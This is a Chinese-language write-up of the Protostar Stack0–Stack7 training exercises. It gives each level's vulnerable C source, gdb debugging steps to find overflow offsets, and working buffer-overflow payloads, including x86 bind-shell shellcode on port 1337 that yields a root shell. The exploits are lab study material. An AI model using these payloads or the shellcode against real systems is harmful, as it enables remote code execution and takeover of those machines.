Protostar Stack Write Up

  • Protostar Stack0
  • Protostar Stack1
  • Protostar Stack2
  • Protostar Stack3
  • Protostar Stack4
  • Protostar Stack5
  • Protostar Stack6
  • Protostar Stack7
  • 小结

Protostar Stack0

#include 
#include 
#include 

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

思路:buffer溢出改变modified的值

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

Protostar Stack1

#include 
#include 
#include 
#include 

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

思路:buffer溢出改变modified的值为0x61626364

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value

Protostar Stack2

#include 
#include 
#include 
#include 

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

思路:buffer溢出改变modified的值为0x0d0a0d0a,而buffer是从环境变量GREENIE复制过来的,所以设置一下该环境变量就好。

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

这是在自己本地的Ubuntu 16.04下的执行结果

但在protostar虚拟机里,执行失败

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

不给设置这样的变量名

不服,写个脚本试试

import os

os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')
$ python se.py 
you have correctly modified the variable

OK

Protostar Stack3

#include 
#include 
#include 
#include 

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

思路:查安全机制

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什么都没开,那么只需要反汇编看一下win的地址,利用buffer溢出就好

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>: push   ebp
   0x08048425 <+1>: mov    ebp,esp
   0x08048427 <+3>: sub    esp,0x18
   0x0804842a <+6>: mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <puts@plt>
   0x08048436 <+18>:    leave  
   0x08048437 <+19>:    ret    
End of assembler dump.

找到win()的地址为0x08048424,编写payload过关

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include 
#include 
#include 
#include 

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

代码真简洁!
思路:溢出buffer,造成崩溃,找到rip被覆盖的偏移量,放入win()的地址

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

覆盖eip的偏移量为76

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

win()的地址为0x80483f4

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include 
#include 
#include 
#include 

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

思路:检查安全机制

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什么也没开,所以,应该可以控制eip,执行shellcode。找到一个shell_bind_tcp 的shellcode,共89字节,端口号为1337。

生成长度为200的测试字符串

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

运行

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip崩溃在0x41344141(‘AA4A’)

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

偏移量为76

此时esp的地址为0xffffcec0,也是我们控制eip要转到的地址,内容为

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

长度为120,可以容纳89字节的shellcode,还可以在shellcode前执行一段nop指令。构造payload:’A’*76+shellcode地址+shellcode

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault!查看core

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

查看0xffffceff附近的存储情况

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

我们的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

还是Segmentation fault!再查看core

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

查看附近内存

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

发现我们的设置的返回地址0xffffcf00中的\x00字节不在内存中,悟了!\x00字节发送不了!但是我设了16个字节的nop,返回地址往后移1到16位都行,对吧?就移1位好了,修改返回地址为0xffffcf01

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

成功!

protostar虚拟机里的esp的地址:0xbffffcc0

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

protostar虚拟机里没有发现gdb与直接运行时esp不一致的问题

Protostar Stack6

#include 
#include 
#include 
#include 

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

返回地址被限制不能在栈中我们可操作的部分
思路:虽然被限制了,但只是限制了getpath函数的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此时只要在栈顶设置好shellcode的地址,就可以绕过限制

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

这次getpath()的返回地址偏移量为80

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

栈指针地址为0xffffceb0,偏移量为84

构造payload:’A’*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault!查看core文件

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

查一下附近的存储情况

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

发现问题了:我们第二次的返回地址应该是0xffffced4,而不是0xffffceb4

而且在连续存储64个A之后,出现了有4个A被替换的情况,此处不解,路过的friend懂的希望不吝赐教

修改payload

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc

上面是在本机Ubuntu上折腾的结果。在protostar的虚拟机上,同样栈指针的地址要加32个字节。获得的esp地址是0xbffffd20,本来+4就是0xbffffd24,但是要再加32个字节变成0xbffffd44才是正解。

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

我尝试了在gdb里执行payload,发现gdb里是不用加32字节的,难道是gdb与系统直接运行的区别?

Protostar Stack7

#include 
#include 
#include 
#include 

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

思路:和stack6一样的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

小结

失败不可怕,可怕的是不去找出失败的原因。

你可能感兴趣的:(exploit)